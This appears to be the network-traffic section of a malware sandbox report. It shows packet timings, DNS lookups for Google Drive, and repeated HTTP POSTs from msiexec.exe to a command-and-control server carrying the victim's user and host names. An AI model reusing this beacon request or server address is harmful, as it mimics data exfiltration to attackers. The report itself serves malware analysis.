                                      Oct 1, 2024 07:43:45.595431089 CEST8049719137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.728682995 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.733674049 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.733762980 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.736512899 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.741379976 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:45.741447926 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:45.746316910 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330589056 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330615997 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330630064 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330643892 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.330750942 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.330802917 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.334021091 CEST4972080192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.338850975 CEST8049720137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.560636044 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.565675020 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.565747023 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.567946911 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.572720051 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:48.572784901 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:48.577534914 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195276022 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195310116 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195353031 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195415020 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.195436954 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195487976 CEST8049721137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.195537090 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.195537090 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.200871944 CEST4972180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.337825060 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.343455076 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.343561888 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.345716000 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.351286888 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:51.351557970 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:51.357475042 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:53.977747917 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:53.977772951 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:53.977787018 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:53.977860928 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:53.978100061 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:53.978187084 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:53.978234053 CEST4972380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:53.982841015 CEST8049723137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:54.120553017 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:54.125655890 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:54.125767946 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:54.127907038 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:54.132739067 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:54.132905960 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:54.138360023 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727062941 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727082014 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727099895 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727108955 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727114916 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727124929 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727196932 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.727202892 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.727251053 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.727258921 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.727283001 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.727453947 CEST4972480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.732249022 CEST8049724137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.866878986 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.871952057 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.872081041 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.874478102 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.879295111 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:43:57.879403114 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:43:57.884170055 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.485987902 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.486028910 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.486047029 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.486062050 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.486166954 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.486375093 CEST4972580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.491197109 CEST8049725137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.637147903 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.642231941 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.642323017 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.644911051 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.649667025 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:00.649719954 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:00.654520035 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.214181900 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.214245081 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.214284897 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.214340925 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.214344978 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.214402914 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.214649916 CEST4972680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.220877886 CEST8049726137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.355110884 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.361354113 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.361452103 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.363595009 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.369666100 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:03.369738102 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:03.375993967 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087287903 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087312937 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087327003 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087342024 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087359905 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087373018 CEST8049727137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.087551117 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.087840080 CEST4972780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.227648020 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.232563972 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.232655048 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.234761000 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.239530087 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:06.239645004 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:06.244537115 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:08.879153013 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:08.879168034 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:08.879179955 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:08.879192114 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:08.879359007 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:08.879359007 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:08.879517078 CEST4972880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:08.884313107 CEST8049728137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:09.028559923 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:09.033571959 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:09.033740044 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:09.036484003 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:09.041286945 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:09.041358948 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:09.046128988 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.705089092 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.705111980 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.705123901 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.705146074 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.705337048 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.705621958 CEST4972980192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.710640907 CEST8049729137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.876733065 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.881808996 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.881911993 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.884329081 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.889158010 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:11.889230967 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:11.894007921 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545639992 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545659065 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545672894 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545685053 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545751095 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.545799971 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.545944929 CEST8049731137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.545990944 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.546056986 CEST4973180192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.681489944 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.686510086 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.686599016 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.688711882 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.693552017 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:15.693619967 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:15.698513985 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.316979885 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.317003965 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.317017078 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.317193985 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.317215919 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.317260027 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.317454100 CEST4973280192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.322155952 CEST8049732137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.462903023 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.467845917 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.467956066 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.470282078 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.475019932 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:18.475107908 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:18.479840040 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.054193020 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.054260015 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.054301023 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.054335117 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.054337978 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.054392099 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.054591894 CEST4973380192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.059438944 CEST8049733137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.197515965 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.202851057 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.202985048 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.205100060 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.209846973 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:21.209923983 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:21.215158939 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.780258894 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.780282021 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.780298948 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.780395031 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.780643940 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.782033920 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.782085896 CEST4973480192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.785360098 CEST8049734137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.919364929 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.924480915 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.924633026 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.926706076 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.931509018 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:23.931600094 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:23.936427116 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.561662912 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.561687946 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.561701059 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.561734915 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.561738014 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.561788082 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.561997890 CEST4973580192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.567193031 CEST8049735137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.697069883 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.701982021 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.702076912 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.704231977 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.709033966 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:26.709115982 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:26.713891983 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.245637894 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.245692015 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.245728970 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.245763063 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.245862961 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.245862961 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.246000051 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.246186018 CEST8049736137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.246234894 CEST4973680192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.391100883 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.396169901 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.396260023 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.398833990 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.403671026 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:29.403729916 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:29.408571959 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:31.998550892 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:31.998613119 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:31.998651981 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:31.998663902 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:31.998686075 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:31.998733044 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:31.998903990 CEST4973780192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:32.003691912 CEST8049737137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:32.142290115 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:32.147270918 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:32.147402048 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:32.149645090 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:32.156251907 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:32.156332016 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:32.161163092 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:34.719510078 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:34.719544888 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:34.719567060 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:34.719619036 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:34.719837904 CEST4973880192.168.2.5137.184.191.215
                                      Oct 1, 2024 07:44:34.721550941 CEST8049738137.184.191.215192.168.2.5
                                      Oct 1, 2024 07:44:34.721611023 CEST4973880192.168.2.5137.184.191.215
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Oct 1, 2024 07:42:59.262137890 CEST | 52277 | 53 | 192.168.2.5 | 1.1.1.1
                                      Oct 1, 2024 07:42:59.269028902 CEST | 53 | 52277 | 1.1.1.1 | 192.168.2.5
                                      Oct 1, 2024 07:43:00.311955929 CEST | 53303 | 53 | 192.168.2.5 | 1.1.1.1
                                      Oct 1, 2024 07:43:00.318708897 CEST | 53 | 53303 | 1.1.1.1 | 192.168.2.5

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Oct 1, 2024 07:42:59.262137890 CEST | 192.168.2.5 | 1.1.1.1 | 0x1ddd | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                      Oct 1, 2024 07:43:00.311955929 CEST | 192.168.2.5 | 1.1.1.1 | 0xd57b | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Oct 1, 2024 07:42:59.269028902 CEST | 1.1.1.1 | 192.168.2.5 | 0x1ddd | No error (0) | drive.google.com |  | 142.250.184.238 | A (IP address) | IN (0x0001) | false
                                      Oct 1, 2024 07:43:00.318708897 CEST | 1.1.1.1 | 192.168.2.5 | 0xd57b | No error (0) | drive.usercontent.google.com |  | 142.250.184.193 | A (IP address) | IN (0x0001) | false

                                      • drive.google.com
                                      • drive.usercontent.google.com
                                      • 137.184.191.215
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:34.545209885 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 180
                                      Connection: close
                                      Oct 1, 2024 07:43:34.551354885 CEST | 180 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2CgESg9
                                      Oct 1, 2024 07:43:37.245479107 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:35 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:37.245507002 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:37.245517969 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:37.245532990 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:37.317486048 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 180
                                      Connection: close
                                      Oct 1, 2024 07:43:37.322516918 CEST | 180 | OUT | Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: 'ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2Cty9cK
                                      Oct 1, 2024 07:43:40.069097996 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:37 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
